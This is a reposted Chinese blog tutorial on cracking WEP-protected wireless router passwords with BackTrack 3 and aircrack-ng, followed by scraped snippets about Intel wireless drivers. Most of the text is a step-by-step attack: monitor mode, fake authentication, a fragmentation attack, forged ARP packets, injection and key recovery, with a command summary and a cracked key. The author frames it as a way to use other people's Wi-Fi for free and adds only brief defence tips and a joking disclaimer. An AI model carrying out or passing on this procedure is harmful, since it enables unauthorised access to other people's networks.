转自:http://www.blogjava.net/fanyingjie/archive/2009/12/01/304347.html
最近很多人问我怎么破解WiFi密码…看来大家都对免费的东西比较有兴趣。要么也可能是我太招摇了…囧…
好吧,我就写篇小小的教程,看完后,你应该能够破解大部分无线路由器密码了,写这个教程也是为了加强大家对无线网络安全性的重视,后面也有简单的防破解的办法。
好了,正式开始。
首先,你需要的工具:
软件:
①
BackTrack 3
(简称
BT3
)
BT3
有光盘版,硬盘版还有
U
盘版,由于本本基本上可以刻碟,我就懒得弄那些
U
盘版,
硬盘版了,直接刻了张碟,所以这篇教程使用光盘版。
下载地址:
U
盘版:
http://backtrack.unixheads.org/bt3final_usb.iso
光盘版:
http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-cd
硬件:
②
一台笔记本,或者台式机配无线网卡。
如果是笔记本,在设备管理器中查看一下你的网卡类型,我的是Intel 3945ABG的,现在市面上大部分笔记本都是用的这个网卡,所以,这篇教程主要针对这个网卡,如果不是,可能也能够破解成功,我也就没有测试了,台式机用的无线网卡同理,也有支持BT3的。
图01-查看网卡
③
其余瓜子,饮料什么的自备。
关于前面的准备部分,网上很多教程都解释得很详细了,我也没做过关于U盘版或者硬盘版,所以这部分跳过…有问题的在下面留言。
插入光盘开机等待几分钟,有个选择模式的界面,一般选择第一个就会进入BT3的图形界面,如图02,如果不能进去,输入账号root,密码toor,然后输入startx,也可以进去,但是我测试过,我的本本进不去,网上找到的答案是显卡不支持(ATI 2400 XT)
进不去第一个的尝试选择第四个图形模式,我的可以进去,如果这个也进不去,那就每个图形模式都试试,都不行的话,那就是RP问题了,你的本本显卡不支持…
图02-进入后界面
然后点右下角的一个黑黑的显示器一样的图标打开一个控制台,如图03:
图03-打开控制台
这时候可以开始输入命令了。
①
ifconfig -a
这
是查看当前网卡信息的,-a是显示全部网卡,如果没有这个参数,就无法显示出无线网卡。这条命令可以查看当前网卡的MAC地址,其中,无线网卡的MAC地
址是我们需要的,就在HWaddr后面的6个16进制字符,后面的那么多00是不要的,应该是为了IP6做准备的。如图04。
图04-查看网卡信息
为了避免信息泄露,我把我的MAC地址和要破解的AP(Access Point,接入点)的MAC地址的后2个字节都隐藏了~呵呵~
可以看到,现在的无线网卡名称是wlan0,这是BT3自动加载的iwl3945驱动起的名字,而这个驱动是不支持之后的破解工作的,所以我们需要换个驱动。
②
modprobe -r iwl3945
卸载当前iwl3945驱动。
③
modprobe ipwraw
加载ipwraw驱动,这个驱动是可以正常使用的。
加
载之后再输入ifconfig
–a试试,就会发现wlan0不见了,出来了个wifi0,如图05,这就是ipwraw给我们的网卡起的名字。这个名字之后会多次用到。这时候也需要把
自己的MAC地址记住,最好是在桌面新建一个文本文件,然后复制进去,方便之后的命令调用。
图05-加载3945驱动
④
airomon-ng start wifi0
这条命令是设置无线网卡为监听模式,因为Windows下这个很难实现,而Linux由于开源,所以大部分黑客软件都是Linux平台下的,我刚开始用BT3的时候就因为iwl3945驱动不能使用监听模式而卡在这里了。设置成功后,如图06。
图06-设置监听模式
⑤
airodump-ng wifi0
既然要破解,那么总得有目标吧,这条命令就是检测当前所能搜索到的所有无线网络信号。其中包括频道,信号强度等信息。运行后如图07。
图07-查看存在AP
里面的几个参数,解释一下,网上也有解释的,但是解释得不太清楚。
BSSID——这个就是路由器的MAC地址了,我要破解的是下面那个,上面那个信号太差。
PWR——这个是信号强度,但是我的电脑显示不出来,显示不出来也没关系,不妨碍之后的破解的,只要在Windows中显示信号很好就可以了。
Beacons——这个是路由器对外发包,可能是SSID广播,我也不太清楚,如果看到这个数据在涨,就代表这个AP还行,一般是1秒涨20~30吧。太慢了就有可能因为信号的原因破解失败。
#Data——这个数据最最重要,这个代表可以用于破解的包,一般这个数据到达1W+,一般的64位的WEP密码就能够破解了。之后我们要做的,就是等待他到达1W,如果数据增长很缓慢(几分钟才增加1),那就只好用另一种方法了,就是发包攻击,这个在后面有介绍。
#/s——DATA增加的速度。
CH——频道,总共有11个频道,可以看到,我要破解的AP的频道是11。
MB——无线的速度,现在一般都是54MB的了。
CIPHER
——加密方式,如果是WEP,就能够用这样的方式破解,如果是WPA/WPA2,目前就只能暴力破解了,话说我现在还不知道怎么暴力破解…等你破解出来的
密码都是12345,1234567890之类的密码时,你就会觉得自己付出的和得到的完全不成比例…TAT。在这里我们只考虑WEP加密的情况。
AUTH——这个应该是
authorization
的缩写,也就是
授权的意思,我也不明白这个有什么用。可能路由器要给客户端发包,就需要验证客户端权限。现在这里是空的,之后会有值的。
ESSID——简单理解,这个就是路由器的名字了。
这一步,我们要做的就是确定需要破解的路由器和它的MAC地址,DATA值增长速度比较快,或者在Windows下信号比较好,或者PWR比较高的,优先。同样,可以把MAC地址写到文本文件中去。
⑥
airodump-ng --ivs -w god -c 11 wifi0
这个命令是检测某个频道的路由器发包,并且保存可用包(也就是#DATA)到一个文件god,这个god是可以改成你喜欢的名字的,但是自己要记住…
参数中,
-c是指频道,后面跟着我要破解的路由器的信号频道,也就是11。
wifi0是我的网卡名称。
输入完这个命令后,这个窗口就不用关了,它要一直抓包的,我们称之为1号窗口。
这时候我们重新打开一个控制台,也就是黑框框。输入之后的命令:
⑦
aireplay-ng -1 0 -a 00:23:CD:89:**:** -h 00-1F-3C-5B-**-** wifi0
-a后面跟着的是目标MAC地址。
-h后面跟着的是本机的无线网卡MAC地址。
wifi0是本机无线网卡名称
这条命令是获取授权,测试模拟发包攻击,具体有什么用,我不太清楚… 可能是测试能否通过发包进行攻击吧。
成功后会出现如下信息:Association successful :-)
然后上面那个窗口中AUTH栏值变成OPN。
图08-测试连接
⑧
aireplay-ng -5 -b 00:23:CD:89:**:** -h 00-1F-3C-5B-**-** wifi0
参数中
-5是aireplay这个程序使用的模式,无需深究。
-b后面跟着的是目标MAC地址。
-h后面跟着的是本机的无线网卡MAC地址。
wifi0是本机无线网卡名称
这
个命令,我的理解是是获取到一个特定的包制作攻击源,然后可以用这个攻击源进行发包攻击。这一步是最难成功的,往往失败就是因为这一步。如果你选择的AP
等了半天DATA值还是0,可以放弃那个了。输入命令后,就开始抓包了,下面的数据会涨,如图09,等抓到一个有用的包的时候,它会问你是否用这个包,如
图10,按Y,然后回车就OK。
但是往往获取到的包都是攻击失败的,如图11,这样就只好继续等了,它会自动开始下一轮抓包的,所以,破解也是需要RP的…RP低的兄弟姐妹还是飘走吧……
图09-获取可用包
图10-获取到可用包
图11-攻击失败
再
说说DATA值为什么会保持在0或者增长缓慢。如果这个AP是有客户端无线连接的,那么它发的数据就多,获取到可用包的几率就大。如果没客户端连接,它做
的工作就是不断向外发送SSID广播,简单说就是告诉大家,我是一个路由器,我的名字是****,我的信号有多大,我有没有密码等等。这样的包,可用来破
解密码的(也就是DATA包)是凤毛麟角啊,一般5000个包能出一个都算不错了…
在等待的过程中,可以打开另一个窗口,输入第9条命令
⑨
aircrack-ng -b 00:23:CD:89:**:** god-01.ivs
参数中
-b后面跟着的是目标MAC地址。
这个就是正式破解了,其中god-01.ivs是我们抓的数据包,也就是DATA包保存成的文件,如果你多次使用airodump抓包,那么你可以去root目录看看最新生成的文件名,然后相应变更。这个程序就用这些抓到的DATA包来计算出密码。运行命令后如图12。
图12-尝试破解失败
可以看到破解失败了。只有34个IVs(DATA包),不失败才怪呢,之前说过一般要1W+才可以的。
第2个窗口中,等啊等,终于等到一个有用的包了,成功信息如图13
图13-获取到可用于攻击的包
成功后程序会生成一个xor文件fragment-0806-150830.xor,记住这个就好,下一条命令要用。
接着输入:
⑩
packetforge-ng
-0 -a 00:23:CD:89:**:** -h 00-1F-3C-5B-**-** -k 255.255.255.255 –l
255.255.255.255 -y fragment-0806-150830.xor -w moon
参数中
-a后面跟着的是目标MAC地址。
-h后面跟着本地无线网卡MAC地址。
-y是上一步中生成的那个xor文件
-w是生成的ARP包文件名,我填了moon,可更改,也要记住。
这个命令是伪造ARP包,用于ARP攻击。
最后一条命令,就让路由器做临死前的挣扎吧…
⑪
aireplay-ng -2 -r moon -x 512 wifi0
moon是上一步保存的ARP包文件名。
512是攻击线程,一般512够了,1024我怕大了,没敢弄。
wifi0是网卡名称。
输入完这一条,就可以看到第1个窗口中的DATA值暴增,如图14。
图14-发包攻击
图上可以看到,DATA的增长速度是361个/s。
然后我们就切换到第3个窗口,就是aircrack那个窗口看看吧,等DATA到了5000,就会自动开始 破解,如果没成功,DATA到达10000又会破解一次。这一切都发生地很迅速。
很快,密码出来了,如图15。
图15-破解成功
从图15可以看到,密码就是8264287788。由于WEP中64位加密是5个ASCII码或者10个16进制字符,所以,我们可以切换Windows,然后用8264287788连接上去,如图16,信号很好哦!
图16-无线连接
【总结】
把所有用到的命令都总结一下,[]内的是需要更改的,方便大家对照修改。
①
ifconfig –a
②
modprobe -r iwl3945
③
modprobe ipwraw
④
airomon-ng start [
网卡名]
⑤
airodump-ng [
网卡名]
⑥
airodump-ng --ivs -w [DATA
包文件名] -c [频道] [网卡名]
⑦
aireplay-ng -1 0 -a [
目标MAC] -h [网卡MAC] [网卡名]
⑧
aireplay-ng -5 -b [
目标MAC] -h [网卡MAC] [网卡名]
⑨
aircrack-ng -b [
目标MAC] [DATA包文件名]-0*.ivs
⑩
packetforge-ng -0 -a [
目标MAC] -h [网卡MAC] -k 255.255.255.255 –l 255.255.255.255 -y [上一步的xor文件名] -w [攻击包文件名]
⑪
aireplay-ng -2 -r [
攻击包文件名] -x [攻击线程] [网卡名]
在本教程中:
[网卡名] ——wifi0
[DATA包文件名]——god
[频道]——11
[目标MAC]——00:23:CD:89:**:**
[网卡MAC]——00-1F-3C-5B-**-**
[上一步的xor文件名]——fragment-0806-150830.xor
[攻击包文件名]——moon
[攻击线程]——512
然后说说怎么样防范自己的AP被像我这样的不速之客破解然后蹭网吧。
①
你可以关闭SSID广播,这样别人就搜索不到你的无线信号了。
②
你可以设置WPA/WPA2加密,现在主流的路由器都支持这个功能,为什么不用呢?
③
你可以把你的SSID改成中文,虽然我没试过,但是网上貌似说这样就不可以破解了。
④
你可以设置MAC地址绑定,但是可以查看合法MAC并伪装MAC的方式破解(感谢楼下兄弟提供建议~)
至此,教程就结束了,有什么问题,可以跟帖问。
我也是个菜鸟,这篇教程也是东拼西凑,再加上自己的一些见解弄出来的,难免有不对的地方,欢迎指正~
最后,我和谐地宣布:
本教程旨在普及无线网络知识,加强大家对无线网络安全问题的认识,希望大家不要拿来做坏事哦~用这个方法造成的一切后果自负,我概不负责。嘿嘿~
相关推荐
Intel_3945ABG无线网卡破解无线路由器密码分享.pdf
Intel_3945ABG无线网卡破解无线路由器密码整理.pdf
Intel_3945ABG无线网卡破解无线路由器密码定义.pdf
Intel 3945abg网卡在Q3下成功破解wep无线密码 Intel 3945abg网卡在Q3下成功破解wep无线密码
本文将详细解析Intel英特尔无线网卡的不同型号及其主要参数,帮助读者了解这些内置无线模块的特点和性能。 首先,Intel的无线网卡型号广泛,涵盖了多种技术标准和接口规格。从早期的802.11b/g到最新的802.11ax(Wi-...
Intel英特尔WiFi Link 3945ABG/4965AGN/5100 AGN/5300 AGN/5150/5350/6200/6250/6300系列无线网卡驱动13.3.0.137官方正式版For Win7-64(2010年9月20日发布)日前,Intel方面对旗下的无线网卡驱动进行了更新升级,...
标题 "hp520无线网卡驱动,Intel(r) Pro/Wireless 3945abg" 提供的关键信息是关于HP520笔记本电脑的无线网卡驱动程序,这个驱动是专为Intel的Pro/Wireless 3945abg无线网卡设计的。Intel PRO/Wireless 3945abg是一款...
- **笔记本电脑**:需配备无线网卡,如Intel 3945ABG,确保能够支持BT3系统中的特定驱动程序。 - **无线网卡**:若使用台式机,则需要购买支持BT3系统的无线网卡。 #### 三、步骤详解 ##### 1. 准备阶段 - **启动...
intel PRO/Wireless 2200BG/2915ABG/3945ABG/4965AGN无线网卡驱动11.5.0.32 intel 旧无线网卡驱动 Marvell无线网卡驱动 Netgear无线网卡驱动 PRISM无线网卡驱动 RaLink无线网卡驱动 Realtek 8180/8185/8187/8187_USB...
标题中的“intel3945驱动for苹果”指的是Intel公司生产的3945ABG无线网卡在苹果操作系统的驱动程序。这款驱动是为了解决苹果电脑用户在使用Intel 3945ABG无线网卡时可能出现的连接问题而设计的。Intel 3945ABG是一款...
Intel3945ABG在BT3下研究学习有(无)客户端wep简明教程,945芯片组本子大多是intel 3945 无线网卡,可按此教程实习,实战。
intel PRO/Wireless 2200BG/2915ABG/3945ABG/4965AGN无线网卡驱动11.5.0.32 intel 旧无线网卡驱动 Marvell无线网卡驱动 Netgear无线网卡驱动 PRISM无线网卡驱动 RaLink无线网卡驱动 Realtek 8180/8185/8187/8187_USB...
intel PRO/Wireless 2200BG/2915ABG/3945ABG/4965AGN无线网卡驱动11.5.0.32 intel 旧无线网卡驱动 Marvell无线网卡驱动 Netgear无线网卡驱动 PRISM无线网卡驱动 RaLink无线网卡驱动 Realtek 8180/8185/8187/...
-d 后跟网卡,在这里为笔记本上常见的内置Intel 3945ABG无线网卡,输入y确定。 步骤3:下面,打开airodump-ng进行无线抓包,命令如下: airodump-ng -w x.cap 127.0.0.1:666 其中: -w 后跟捕获的Cap数据包文件 ...
Intel英特尔PRO/Wireless 2200BG/PRO Wireless 2915ABG/PRO Wireless 3945ABG无线笔记本网卡最新驱动包10.1.1.3版For Win2000/XP(2006年5月8日发布)Intel PRO/Wireless系列无线网卡是英特尔迅驰移动技术中一项重要...
标题中的“Intel(R) PRO 无线 3945ABG 网络连接_12.4.1.4.zip”指的是Intel公司为Intel PRO 无线3945ABG网络适配器提供的驱动程序更新,版本号为12.4.1.4。这个驱动程序是专为那些使用这款无线网卡的计算机设计的,...
-d 后跟网卡,在这里为笔记本上常见的内置Intel 3945ABG无线网卡,输入y确定。 步骤3:下面,打开airodump-ng进行无线抓包,命令如下: airodump-ng -w x.cap 127.0.0.1:666 其中: -w 后跟捕获的Cap数据包文件 ...
在IT行业中,网络安全与数据通信是至关重要的领域,而WildPackets OmniPeek Personal 41正是这样一款强大的无线网络分析工具,专为Intel 3945ABG无线网卡设计,能够帮助用户捕获并解析网络数据包,从而对无线局域网...